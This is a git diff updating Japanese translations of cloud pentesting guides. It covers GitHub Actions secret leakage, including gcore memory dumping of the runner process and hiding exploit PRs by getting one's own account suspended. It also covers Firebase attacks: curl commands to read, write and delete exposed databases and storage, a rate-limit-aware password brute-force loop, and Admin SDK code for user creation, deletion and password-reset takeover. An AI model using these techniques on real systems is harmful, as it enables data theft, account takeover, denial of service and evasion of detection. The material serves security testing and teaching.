 sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
 ```
-Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
+詳細は [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/) を参照してください。
 
-### Github Docker イメージ レジストリ
+### Github Docker イメージのレジストリ
 
-Github actions を作成して、**Github 内に Docker イメージをビルドして保存する**ことが可能です.\
-以下の展開セクションに例があります:
+Github actions を作成して、**Docker イメージを Github 内にビルドして保存**することが可能です。\
+例は以下の展開可能な項目にあります:
 
 <details>
 
@@ -661,31 +682,31 @@ ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ e
 ```
 </details>
 
-前のコードでわかるように、Github レジストリは **`ghcr.io`** にホストされています。
+前のコードでわかるように、Github registry は **`ghcr.io`** にホストされています。
 
-リポジトリに対する read permissions を持つユーザーは、personal access token を使用して Docker Image をダウンロードできます:
+リポジトリに対する読み取り権限を持つユーザーは、パーソナルアクセストークンを使って Docker Image をダウンロードできます:
 ```bash
 echo $gh_token | docker login ghcr.io -u <username> --password-stdin
 docker pull ghcr.io/<org-name>/<repo_name>:<tag>
 ```
-次に、ユーザーは**leaked secrets in the Docker image layers:** を検索できます
+その後、ユーザーは **leaked secrets in the Docker image layers:** を検索できます:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.html
 {{#endref}}
 
-### Github Actions ログの機密情報
+### Github Actions logs における機密情報
 
-たとえ**Github**が Actions のログ内の**secret values を検出**して**表示を避ける**ようにしても、アクションの実行中に生成された可能性のある**その他の機密データ**は隠されません。例えば、シークレット値で署名された JWT は、[specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret) されていない限り隠されません。
+たとえ **Github** が actions logs 内の **detect secret values** を試みてそれらの **avoid showing** を行っても、action の実行中に生成される可能性のある **other sensitive data** は隠されません。例えば、secret value で署名された **JWT** は、[specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret) されていない限り隠されません。
 
-## 足跡を隠す
+## 痕跡の隠蔽 (Covering your Tracks)
 
-(手法は [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit) より) まず第一に、作成した PR は Github 上で一般公開され、ターゲットの GitHub アカウントからも明確に見えます。GitHub ではデフォルトで、インターネット上の PR を我々が削除することはできませんが、ひとつ仕掛けがあります。Github によってアカウントが **suspended** された場合、そのアカウントのすべての **PRs are automatically deleted** され、インターネットから削除されます。したがって、自分の活動を隠すには、**GitHub account suspended or get your account flagged** のいずれかにする必要があります。これにより GitHub 上の **hide all your activities**（基本的にはエクスプロイト PR をすべて削除）が実現します。
+(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) まず、作成した PR は Github 上で公開され、対象の GitHub アカウントからも明確に見えます。GitHub ではデフォルトで、**can’t delete a PR of the internet** が、ここにひとつの抜け道があります。Github によってアカウントが **suspended** されると、そのアカウントの **PRs are automatically deleted** され、インターネット上から削除されます。したがって、自分の活動を隠すには、**GitHub account suspended or get your account flagged** される必要があります。これにより GitHub 上のすべての活動がインターネットから**hide all your activities**（事実上、すべての exploit PR を削除）されます。
 
-組織側は GitHub にアカウントを報告することに非常に積極的です。Issue に「いくつかの内容」を投稿するだけで、彼らは 12 時間以内にあなたのアカウントを suspended してくれるでしょう :p これで、あなたのエクスプロイトは GitHub 上で見えなくなります。
+組織は GitHub 上でアカウントを報告することに非常に積極的です。Issue に「some stuff」を投稿するだけで、12 時間以内にあなたのアカウントが停止されるよう手配されることが多く :p そうすれば、あなたの exploit は GitHub 上で見えなくなります。
 
 > [!WARNING]
-> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
+> 組織が自分たちが狙われたことに気付く唯一の方法は、GitHub UI 上では PR が削除されてしまうため、SIEM から GitHub logs を確認することです。
 
 ## References
 
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md
index 88acc625e..f69d247c3 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md
@@ -4,27 +4,27 @@
 
 ## Firebase
 
-### Unauthenticated access to Firebase Realtime Database
-攻撃者はこの攻撃を行うために特別な Firebase 権限を必要としません。必要なのは、Firebase Realtime Database の security rules が脆弱に設定されており、`.read: true` または `.write: true` が設定されてパブリックな読み取り/書き込みアクセスを許可していることだけです。
+### Firebase Realtime Database への未認証アクセス
+攻撃者はこの攻撃を実行するために特定の Firebase 権限を必要としません。必要なのは Firebase Realtime Database のセキュリティルールが脆弱に設定され、`.read: true` または `.write: true` により公開読み取り／書き込みが許可されていることだけです。
 
-攻撃者はデータベースの URL を特定する必要があり、通常は次の形式に従います: `https://<project-id>.firebaseio.com/`。
+攻撃者はデータベースの URL を特定する必要があり、通常は `https://<project-id>.firebaseio.com/` の形式になります。
 
-この URL は、モバイルアプリのリバースエンジニアリング（Android APK のデコンパイルや iOS アプリの解析）、google-services.json（Android）や GoogleService-Info.plist（iOS）などの設定ファイルの解析、ウェブアプリのソースコードの確認、またはネットワークトラフィックを調べて `*.firebaseio.com` へのリクエストを特定することで見つけることができます。
+この URL は、モバイルアプリのリバースエンジニアリング（Android APK をデコンパイルする、または iOS アプリを解析する）、google-services.json（Android）や GoogleService-Info.plist（iOS）などの設定ファイルの解析、ウェブアプリのソースコードの検査、またはネットワークトラフィックを調べて `*.firebaseio.com` へのリクエストを特定することで見つけられます。
 
-攻撃者はデータベースの URL を特定して公開されているか確認し、データにアクセスしたり、悪意のある情報を書き込んだりします。
+攻撃者はデータベース URL を特定して公開されているか確認し、データにアクセスしたり、悪意のある情報を書き込んだりする可能性があります。
 
-まず、URL に `.json` を付けて、データベースが読み取りを許可しているかを確認します。
+まず、URL に .json を付けてデータベースが読み取りを許可しているか確認します。
 ```bash
 curl https://<project-id>-default-rtdb.firebaseio.com/.json
 ```
-レスポンスがJSONデータまたはnull（"Permission Denied"の代わりに）を含む場合、データベースは読み取りアクセスを許可している。書き込みアクセスを確認するには、攻撃者はFirebase REST APIを使用してテストの書き込みリクエストを送信してみることができる。
+レスポンスが JSON データまたは null（"Permission Denied" の代わりに）を含む場合、データベースは read access を許可しています。write access を確認するには、attacker は Firebase REST API を使ってテスト用の write request を送信してみることができます。
 ```bash
 curl -X PUT https://<project-id>-default-rtdb.firebaseio.com/test.json -d '{"test": "data"}'
 ```
-操作が成功すると、データベースは write access も許可します。
+操作が成功すると、そのデータベースは書き込みアクセスも許可します。
 
 ### Cloud Firestore におけるデータの露出
-攻撃者はこの攻撃を実行するために特別な Firebase の権限を必要としません。必要なのは、Cloud Firestore のセキュリティルールが認証なし、または不十分な検証で read or write access を許可する脆弱な設定になっていることだけです。フルアクセスを付与する誤設定ルールの例は次のとおりです：
+攻撃者はこの攻撃を実行するために特定の Firebase 権限を必要としません。必要なのは、Cloud Firestore のセキュリティルールが認証なし、または不十分な検証で読み取りまたは書き込みを許可するような脆弱な設定になっていることだけです。フルアクセスを許す誤設定ルールの例は次のとおりです：
 ```bash
 service cloud.firestore {
 match /databases/{database}/documents/{document=**} {
@@ -32,23 +32,22 @@ allow read, write: if true;
 }
 }
 ```
-このルールは誰でも制限なくすべてのドキュメントを読み書きできるようにします。Firestore のルールは細かく設定されており、コレクションやドキュメント単位で適用されるため、特定のルールの誤りが一部のコレクションのみを露出させる場合があります。
+このルールは、誰でもすべてのドキュメントを制限なく読み書きできるようにします。Firestore rules は粒度が細かく、コレクションやドキュメント単位で適用されるため、特定のルールの誤設定が一部のコレクションのみを公開してしまう場合があります。
 
-攻撃者は Firebase Project ID を特定する必要があります。これは mobile app reverse engineering、google-services.json や GoogleService-Info.plist といった設定ファイルの解析、webアプリケーションのソースコードの調査、あるいは firestore.googleapis.com へのリクエストを特定するためのネットワークトラフィック解析などで見つけられます。
-
-Firestore REST API は次の形式を使用します：
+攻撃者は Firebase Project ID を特定する必要があり、これは mobile app reverse engineering、google-services.json や GoogleService-Info.plist といった設定ファイルの解析、web アプリケーションのソースコードの検査、あるいは firestore.googleapis.com へのリクエストを特定するための network traffic の解析などで見つけられます。
+The Firestore REST API uses the format:
 ```bash
 https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
 ```
-ルールが unauthenticated read access を許可している場合、攻撃者はコレクションとドキュメントを読み取ることができます。まず、特定のコレクションにアクセスを試みます:
+ルールが未認証での読み取りアクセスを許可している場合、攻撃者はコレクションとドキュメントを読み取ることができます。まず、特定のコレクションにアクセスしようとします:
 ```bash
 curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>
 ```
-レスポンスが permission error（権限エラー）の代わりに JSON ドキュメントを含んでいる場合、その collection は公開されています。攻撃者は一般的な名前を試したりアプリケーションの構造を解析したりして、アクセス可能な collection を列挙できます。特定のドキュメントにアクセスするには:
+レスポンスが権限エラーではなくJSONドキュメントを返す場合、そのコレクションは公開されています。攻撃者は一般的な名前を試すかアプリケーションの構造を解析することで、アクセス可能なすべてのコレクションを列挙できます。特定のドキュメントにアクセスするには：
 ```bash
 curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
 ```
-ルールが未認証の書き込みアクセスを許可しているか検証が不十分な場合、攻撃者は新しいドキュメントを作成できます:
+ルールが未認証の書き込みアクセスを許可している場合、またはバリデーションが不十分な場合、攻撃者は新しいドキュメントを作成できます:
 ```bash
 curl -X POST https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection> \
 -H "Content-Type: application/json" \
@@ -59,7 +58,7 @@ curl -X POST https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases
 }
 }'
 ```
-既存のドキュメントを変更するには PATCH を使用する必要があります:
+既存のドキュメントを変更するには PATCH を使用します:
 ```bash
 curl -X PATCH https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/users/<user-id> \
 -H "Content-Type: application/json" \
@@ -69,12 +68,12 @@ curl -X PATCH https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/database
 }
 }'
 ```
-ドキュメントを削除してサービス拒否を引き起こすには:
+ドキュメントを削除して denial of service を引き起こすには:
 ```bash
 curl -X DELETE https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
 ```
-### Firebase Storage のファイルの露出
-攻撃者はこの攻撃を実行するために特定の Firebase 権限を必要としません。必要なのは、Firebase Storage のセキュリティルールで認証なし、または不十分な検証により読み取りまたは書き込みアクセスを許可する脆弱な設定が存在することだけです。Storage rules は読み取りと書き込みの権限を独立して制御するため、ルールの誤りにより読み取りのみ、書き込みのみ、または両方が公開される可能性があります。完全なアクセスを許可する誤設定の例は次のとおりです:
+### Firebase Storage におけるファイルの公開
+攻撃者はこの攻撃を実行するために特別な Firebase 権限を必要としません。必要なのは、Firebase Storage のセキュリティルールに脆弱な設定があり、認証なしまたは不十分な検証で読み取りまたは書き込みアクセスを許可していることだけです。セキュリティルールは読み取りと書き込みの許可を独立して制御するため、ルールの誤設定により読み取りのみ、書き込みのみ、または両方が公開される可能性があります。誤って完全なアクセスを許可してしまうルールの例は次のとおりです:
 ```bash
 service cloud.firestore {
 match /databases/{database}/documents/{document=**} {
@@ -82,44 +81,44 @@ allow read, write: if true;
 }
 }
 ```
-このルールは、すべてのドキュメントへの読み取り・書き込みアクセスを制限なく許可します。Firestore のルールは細かく、コレクションごとおよびドキュメントごとに適用されるため、特定のルールのミスは一部のコレクションのみを公開してしまう可能性があります。攻撃者は Firebase Project ID を特定する必要があり、これはモバイルアプリのリバースエンジニアリング、google-services.json や GoogleService-Info.plist のような設定ファイルの解析、Web アプリケーションのソースコードの調査、または firestore.googleapis.com へのリクエストを特定するためのネットワークトラフィック解析によって見つけることができます。
-Firestore REST API は次の形式を使用します: `https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>.`
+このルールは、すべてのドキュメントに対して制限なく読み取りおよび書き込みアクセスを許可します。Firestore のルールは細かく、コレクション単位およびドキュメント単位で適用されるため、特定のルールの誤設定によって一部のコレクションのみが公開されることがあります。攻撃者は Firebase Project ID を特定する必要があり、これは mobile application reverse engineering、google-services.json や GoogleService-Info.plist といった設定ファイルの解析、web application source code の検査、あるいは firestore.googleapis.com へのリクエストを識別するためのネットワークトラフィック解析によって見つけられます。
+The Firestore REST API uses the format:`https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>.`
 
-ルールが unauthenticated の読み取りアクセスを許可している場合、攻撃者はコレクションやドキュメントを読み取ることができます。まず、特定のコレクションへアクセスを試みます。
+ルールが未認証の読み取りアクセスを許可している場合、攻撃者はコレクションおよびドキュメントを読み取ることができます。まず、特定のコレクションへのアクセスを試みます。
 ```bash
 curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o"
 curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?prefix=<path>"
 ```
-レスポンスが権限エラーの代わりにファイルの一覧を含んでいる場合、そのファイルは公開されています。攻撃者はファイルのパスを指定することで、その内容を閲覧できます:
+レスポンスが権限エラーの代わりにファイル一覧を含む場合、そのファイルは公開されています。攻撃者はパスを指定することでファイルの内容を閲覧できます:
 ```bash
 curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<urlencode(path)>"
 ```
-ルールが認証なしの書き込みアクセスを許可しているか、検証が不十分な場合、攻撃者は悪意のあるファイルをアップロードできます。REST APIを使ってファイルをアップロードするには:
+ルールが未認証の書き込みアクセスを許可している、または検証が不十分な場合、攻撃者は悪意のあるファイルをアップロードできます。REST API を介してファイルをアップロードするには:
 ```bash
 curl -X POST "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?name=<path>" \
 -H "Content-Type: <content-type>" \
 --data-binary @<local-file>
 ```
-attackerはcode shells、malware payloads、またはlarge filesをuploadしてdenial of serviceを引き起こすことができる。もしapplicationがuploaded filesをprocessまたはexecuteする場合、attackerはremote code executionを達成する可能性がある。ファイルをdeleteしてdenial of serviceを引き起こすには:
+攻撃者は code shells、malware payloads、または大きなファイルをアップロードして denial of service を引き起こすことができます。アプリケーションがアップロードされたファイルを処理または実行する場合、攻撃者は remote code execution を達成する可能性があります。ファイルを削除して denial of service を引き起こすには：
 ```bash
 curl -X DELETE "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<path>"
 ```
-### Invocation of public Firebase Cloud Functions
-攻撃者はこの問題を悪用するために特別な Firebase 権限を必要としません。必要なのは、Cloud Function が認証なしで HTTP 経由で公開されていることだけです。
+### 公開された Firebase Cloud Functions の呼び出し
+攻撃者がこの問題を悪用するために特定の Firebase 権限は不要で、HTTP 経由で認証なしに公開された Cloud Function が存在するだけで十分です。
 
-A function is vulnerable when it is insecurely configured:
+関数は次のように不適切に設定されている場合に脆弱になります:
 
-- It uses functions.https.onRequest, which does not enforce authentication (unlike onCall functions).
-- 関数のコードがユーザー認証を検証していない（例: request.auth や context.auth のチェックがない）。
-- The function is publicly accessible in IAM, meaning allUsers has the roles/cloudfunctions.invoker role. This is the default behavior for HTTP functions unless the developer restricts access.
+- `functions.https.onRequest` を使用している — これは認証を強制しません（`onCall` 関数とは異なります）。
+- 関数のコードがユーザーの認証を検証していない（例: `request.auth` や `context.auth` のチェックがない）。
+- 関数が IAM で公開されており、allUsers が roles/cloudfunctions.invoker ロールを持っていることを意味します。これは、開発者がアクセスを制限しない限り HTTP 関数のデフォルト動作です。
 
-Firebase HTTP Cloud Functions are exposed through URLs such as:
+Firebase HTTP Cloud Functions は、次のような URL で公開されます:
 
 - `https://<region>-<project-id>.cloudfunctions.net/<function-name>`
 - `https://<project-id>.web.app/<function-name>` (when integrated with Firebase Hosting)
 
-攻撃者はソースコード解析、ネットワークトラフィックの解析、列挙ツール、またはモバイルアプリのリバースエンジニアリングなどを通じてこれらの URL を発見できます。
-If the function is publicly exposed and unauthenticated, the attacker can invoke it directly without credentials.
+攻撃者は、これらの URL を source code analysis、network traffic inspection、enumeration tools、または mobile app reverse engineering によって発見できます。  
+関数が公開されていて認証されていない場合、攻撃者は資格情報なしで直接呼び出すことができます。
 ```bash
 # Invoke public HTTP function with GET
 curl "https://<region>-<project-id>.cloudfunctions.net/<function-name>"
@@ -128,21 +127,22 @@ curl -X POST "https://<region>-<project-id>.cloudfunctions.net/<function-name>"
 -H "Content-Type: application/json" \
 -d '{"param1": "value1", "param2": "value2"}'
 ```
-関数が入力を適切に検証しない場合、攻撃者は code injection や command injection のような他の攻撃を試みる可能性があります。
+関数が入力を適切に検証しない場合、攻撃者はcode injectionやcommand injectionなどの他の攻撃を試みる可能性があります。
 
-### Brute-force attack against Firebase Authentication — パスワードポリシーが弱い場合
-攻撃者はこの攻撃を実行するために特別な Firebase の権限を必要としません。必要なのは、Firebase API Key がモバイルやウェブアプリケーションで公開されていること、そしてパスワードポリシーがデフォルトより厳しく設定されていないことだけです。
 
-攻撃者は Firebase API Key を特定する必要があり、これは mobile app reverse engineering、google-services.json や GoogleService-Info.plist といった設定ファイルの解析、ウェブアプリケーションのソースコードの検査（例: bootstrap.js 内）、またはネットワークトラフィックの解析で見つかります。
+### Brute-force attack against Firebase Authentication with a weak password policy
+攻撃者はこの攻撃を実行するために特定の Firebase 権限を必要としません。必要なのは、Firebase API Key がモバイルやウェブアプリに露出していること、そしてパスワードポリシーがデフォルトより厳しく設定されていないことだけです。
 
-Firebase Authentication の REST API は次のエンドポイントを使用して、email と password で認証します:
+攻撃者は Firebase API Key を特定する必要があり、これは mobile app reverse engineering、google-services.json や GoogleService-Info.plist のような設定ファイルの解析、ウェブアプリのソースコードの確認（例: bootstrap.js）、またはネットワークトラフィックの解析によって見つけられます。
+
+Firebase Authentication の REST API は以下のエンドポイントを使用して、email と password で認証します:
 `https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>`
 
-Email Enumeration Protection が無効化されている場合、API のエラー応答はメールアドレスがシステムに存在するかどうかを示す可能性があります（EMAIL_NOT_FOUND vs. INVALID_PASSWORD）。これにより、攻撃者はパスワード推測を試みる前にユーザーを列挙できます。この保護が有効になっている場合、API は存在しないメールアドレスと誤ったパスワードの両方に対して同じエラーメッセージを返し、ユーザー列挙を防ぎます。
+もし Email Enumeration Protection が無効になっていると、API のエラー応答からメールがシステムに存在するかどうか（EMAIL_NOT_FOUND vs. INVALID_PASSWORD）を明らかにすることができ、攻撃者はパスワード推測を行う前にユーザの列挙を行うことが可能になります。保護が有効な場合、API は存在しないメールと間違ったパスワードの両方に対して同じエラーメッセージを返し、ユーザ列挙を防ぎます。
 
-Firebase Authentication は rate limiting を強制するため、短時間にあまりにも多くの認証試行が行われるとリクエストがブロックされる可能性があることに注意してください。このため、攻撃者はレート制限を避けるために試行間に遅延を入れる必要があります。
+重要なのは、Firebase Authentication がレート制限を強制しており、短時間に認証試行が多すぎるとリクエストがブロックされる可能性があることです。そのため、攻撃者はレート制限を回避するために試行間に遅延を挟む必要があります。
 
-攻撃者は API Key を特定し、既知のアカウントに対して複数のパスワードで認証試行を行います。Email Enumeration Protection が無効化されている場合、攻撃者はエラー応答を分析することで既存ユーザーを列挙できます：
+攻撃者は API Key を特定し、既知のアカウントに対して複数のパスワードで認証試行を行います。Email Enumeration Protection が無効な場合、攻撃者はエラー応答を解析して既存ユーザを列挙できます:
 ```bash
 # Attempt authentication with a known email and an incorrect password
 curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>" \
@@ -153,7 +153,7 @@ curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassw
 "returnSecureToken": true
 }'
 ```
-レスポンスにEMAIL_NOT_FOUNDが含まれている場合、そのメールはシステムに存在しません。INVALID_PASSWORDが含まれている場合は、メールは存在するがパスワードが間違っており、ユーザーが登録されていることが確認できます。有効なユーザーが特定されると、攻撃者はbrute-force attemptsを行うことができます。Firebase Authenticationのレート制限を回避するために、試行間にポーズを入れることが重要です：
+レスポンスに EMAIL_NOT_FOUND が含まれている場合、そのメールアドレスはシステムに存在しません。INVALID_PASSWORD が含まれている場合、そのメールアドレスは存在するがパスワードが間違っており、ユーザーが登録されていることが確認できます。有効なユーザーが特定されると、攻撃者は brute-force を試みることができます。Firebase Authentication のレート制限に引っかからないよう、試行の間に適切な待機を入れることが重要です:
 ```bash
 counter=1
 for password in $(cat wordlist.txt); do
@@ -172,11 +172,11 @@ sleep 1
 counter=$((counter + 1))
 done
 ```
-デフォルトのパスワードポリシー（最小6文字、複雑さの要件なし）では、攻撃者は6文字パスワードの全組み合わせを試すことができ、より厳しいパスワードポリシーと比べて探索空間は比較的小さくなります。
+デフォルトのパスワードポリシー（最小6文字、複雑性要件なし）の場合、攻撃者は6文字パスワードの全組み合わせを試すことができ、より厳しいポリシーと比べて探索空間は比較的に小さくなります。
 
 ### Firebase Authentication におけるユーザー管理
 
-攻撃を実行するには、特定の Firebase Authentication 権限が必要です。必要な権限は次のとおりです:
+この攻撃を実行するには、攻撃者は特定の Firebase Authentication の権限が必要です。必要な権限は次のとおりです:
 
 - `firebaseauth.users.create` to create users
 - `firebaseauth.users.update` to modify existing users
@@ -185,9 +185,70 @@ done
 - `firebaseauth.users.sendEmail` to send emails to users
 - `firebaseauth.users.createSession` to create user sessions
 
-これらの権限は `roles/firebaseauth.admin` ロールに含まれており、Firebase Authentication リソースへの読み書きフルアクセスを付与します。これらは roles/firebase.developAdmin （すべての firebaseauth.* 権限を含む）や roles/firebase.admin （すべての Firebase サービスへのフルアクセス）などの上位ロールにも含まれます。
+これらの権限は `roles/firebaseauth.admin` ロールに含まれており、Firebase Authentication リソースへの完全な読み書きアクセスを付与します。また、`roles/firebase.developAdmin`（すべての firebaseauth.* 権限を含む）や `roles/firebase.admin`（すべての Firebase サービスへの完全アクセス）などの上位ロールにも含まれます。
 
-Firebase Admin SDK を使用するには、攻撃者はサービスアカウントの資格情報（JSONファイル）へのアクセスを必要とします。これらは、侵害されたシステム、公開されたコードリポジトリ、侵害された CI/CD システム、またはこれらの資格情報にアクセスできる開発者アカウントの侵害により見つかる可能性があります。
+Firebase Admin SDK を使用するには、攻撃者はサービスアカウントの資格情報（JSON ファイル）へのアクセスを必要とします。これらは、侵害されたシステム、公開されたコードリポジトリ、侵害された CI/CD システム、またはこれらの資格情報へアクセスできる開発者アカウントの侵害を通じて見つかる可能性があります。
+
+最初のステップは、サービスアカウントの資格情報を使って Firebase Admin SDK を設定することです。
+```bash
+import firebase_admin
+from firebase_admin import credentials, auth
+cred = credentials.Certificate('path/to/serviceAccountKey.json')
+firebase_admin.initialize_app(cred)
+```
+被害者のメールアドレスを使って悪意のあるユーザーを作成するため、攻撃者は Firebase Admin SDK を使用してそのメールアドレスで新しいアカウントを生成しようとします。
+```bash
+user = auth.create_user(
+email='victima@example.com',
+email_verified=False,
+password='password123',
+display_name='Usuario Malicioso',
+disabled=False
+)
+print(f'Usuario creado: {user.uid}')
+```
+既存のユーザーを変更するには、attackerはメールアドレス、検証状態、アカウントが無効化されているかどうかなどのフィールドを更新します。
+```bash
+user = auth.update_user(
+uid,
+email='nuevo-email@example.com',
+email_verified=True,
+disabled=False
+)
+print(f'Usuario actualizado: {user.uid}')
+```
+ユーザーアカウントを削除して denial of service を引き起こすために、攻撃者はそのユーザーを完全に削除するリクエストを発行します。
+```bash
+auth.delete_user(uid)
+print('Usuario eliminado exitosamente')
+```
+攻撃者は、UIDやメールアドレスを指定して既存ユーザーの情報を取得することもできます。
+```bash
+user = auth.get_user(uid)
+print(f'Información del usuario: {user.uid}, {user.email}')
+user = auth.get_user_by_email('usuario@example.com')
+print(f'Información del usuario: {user.uid}, {user.email}')
+```
+さらに、攻撃者は検証リンクやパスワード再設定リンクを生成してユーザーのパスワードを変更し、そのアカウントにアクセスできるようにする可能性がある。
+```bash
+link = auth.generate_email_verification_link(email)
+print(f'Link de verificación: {link}')
+link = auth.generate_password_reset_link(email)
+print(f'Link de reset: {link}')
+```
+### Firebase Authentication のユーザー管理
+攻撃者がこの攻撃を実行するには、Firebase Authentication の特定の権限が必要です。必要な権限は次のとおりです：
+
+- `firebaseauth.users.create` — ユーザーを作成するため
+- `firebaseauth.users.update` — 既存ユーザーを変更するため
+- `firebaseauth.users.delete` — ユーザーを削除するため
+- `firebaseauth.users.get` — ユーザー情報を取得するため
+- `firebaseauth.users.sendEmail` — ユーザーへメールを送信するため
+- `firebaseauth.users.createSession` — ユーザーセッションを作成するため
+
+これらの権限は roles/firebaseauth.admin ロールに含まれており、Firebase Authentication リソースへの完全な読み書きアクセスを付与します。また、`roles/firebase.developAdmin`（firebaseauth.* のすべての権限を含む）や `roles/firebase.admin`（すべての Firebase サービスへのフルアクセス）などの上位ロールにも含まれます。
+
+Firebase Admin SDK を使用するには、攻撃者はサービスアカウントの資格情報（JSON ファイル）へのアクセスが必要であり、これらは侵害されたシステム、公開されているコードリポジトリ、侵害された CI/CD 環境、またはこれらの資格情報にアクセスできる開発者アカウントの侵害などから取得される可能性があります。
 
 最初のステップは、サービスアカウントの資格情報を使用して Firebase Admin SDK を設定することです。
 ```bash
@@ -196,7 +257,7 @@ from firebase_admin import credentials, auth
 cred = credentials.Certificate('path/to/serviceAccountKey.json')
 firebase_admin.initialize_app(cred)
 ```
-被害者のメールアドレスを使って悪意のあるユーザーを作成するため、攻撃者は Firebase Admin SDK を使ってそのメールアドレスで新しいアカウントを作成しようとします。
+victim’s emailを使用して悪意のあるユーザーを作成するために、attackerはそのメールアドレスで新しいユーザーアカウントを作成し、自分のパスワードとプロフィール情報を割り当てようとします。
 ```bash
 user = auth.create_user(
 email='victima@example.com',
@@ -207,7 +268,7 @@ disabled=False
 )
 print(f'Usuario creado: {user.uid}')
 ```
-既存のユーザーを変更するには、attacker はメールアドレス、検証ステータス、またはアカウントが無効化されているかどうかといったフィールドを更新します。
+既存ユーザーを変更する際、攻撃者はメールアドレス、確認状態、またはアカウントが無効化されているかどうかといったフィールドを変更します。
 ```bash
 user = auth.update_user(
 uid,
@@ -217,96 +278,36 @@ disabled=False
 )
 print(f'Usuario actualizado: {user.uid}')
 ```
-ユーザーアカウントを削除してサービス拒否を引き起こすために、攻撃者は対象ユーザーを完全に削除するリクエストを送信します。
+ユーザーアカウントを削除することで—実質的に denial of service を引き起こす—攻撃者はそのユーザーを永久に削除するリクエストを送信します。
 ```bash
 auth.delete_user(uid)
 print('Usuario eliminado exitosamente')
 ```
-攻撃者は、UIDやメールアドレスを指定して要求することで、既存ユーザーに関する情報を取得することもできます。
+攻撃者は、UIDやemailなど既存ユーザーの情報を、UIDまたはemail addressでユーザー詳細を要求して取得することもできます。
 ```bash
 user = auth.get_user(uid)
 print(f'Información del usuario: {user.uid}, {user.email}')
 user = auth.get_user_by_email('usuario@example.com')
 print(f'Información del usuario: {user.uid}, {user.email}')
 ```
-さらに、攻撃者は検証リンクやパスワードリセットリンクを生成して、ユーザーのパスワードを変更し、そのアカウントにアクセスすることができます。
+さらに、攻撃者は verification links や password-reset links を生成して、ユーザーのパスワードを変更しアカウントを乗っ取ることができます。
 ```bash
 link = auth.generate_email_verification_link(email)
 print(f'Link de verificación: {link}')
 link = auth.generate_password_reset_link(email)
 print(f'Link de reset: {link}')
 ```
-### Firebase Authentication におけるユーザー管理
-攻撃者がこの攻撃を実行するには、特定の Firebase Authentication の権限が必要です。必要な権限は以下の通りです:
+### Firebase サービスのセキュリティルールの変更
+攻撃者はサービスに応じてセキュリティルールを変更するための特定の権限を必要とする。Cloud Firestore および Firebase Cloud Storage では、ルールセットを作成するために `firebaserules.rulesets.create`、リリースをデプロイするために `firebaserules.releases.create` が必要である。これらの権限は `roles/firebaserules.admin` ロール、または `roles/firebase.developAdmin` や `roles/firebase.admin` のような上位ロールに含まれている。Firebase Realtime Database の場合、必要な権限は `firebasedatabase.instances.update` である。
 
-- `firebaseauth.users.create` — ユーザーを作成するため
-- `firebaseauth.users.update` — 既存のユーザーを修正するため
-- `firebaseauth.users.delete` — ユーザーを削除するため
-- `firebaseauth.users.get` — ユーザー情報を取得するため
-- `firebaseauth.users.sendEmail` — ユーザーにメールを送信するため
-- `firebaseauth.users.createSession` — ユーザーセッションを作成するため
-
-これらの権限は roles/firebaseauth.admin ロールに含まれており、Firebase Authentication リソースへの完全な読み書きアクセスを付与します。`roles/firebase.developAdmin`（すべての firebaseauth.* 権限を含む）や `roles/firebase.admin`（Firebase のすべてのサービスへのフルアクセス）など、より上位のロールにも含まれます。
-
-Firebase Admin SDK を使用するには、攻撃者はサービスアカウントの認証情報（JSON ファイル）へのアクセスが必要です。これらは侵害されたシステム、公開されたコードリポジトリ、侵害された CI/CD 環境、またはこれらの認証情報へのアクセス権を持つ開発者アカウントの侵害などから入手される可能性があります。
-
-最初のステップは、サービスアカウントの認証情報を使って Firebase Admin SDK を設定することです。
-```bash
-import firebase_admin
-from firebase_admin import credentials, auth
-cred = credentials.Certificate('path/to/serviceAccountKey.json')
-firebase_admin.initialize_app(cred)
-```
-被害者のメールアドレスを使って悪意のあるユーザーを作成するために、攻撃者はそのメールで新しいユーザーアカウントを作成し、自分のパスワードとプロフィール情報を割り当てようとします。
-```bash
-user = auth.create_user(
-email='victima@example.com',
-email_verified=False,
-password='password123',
-display_name='Usuario Malicioso',
-disabled=False
-)
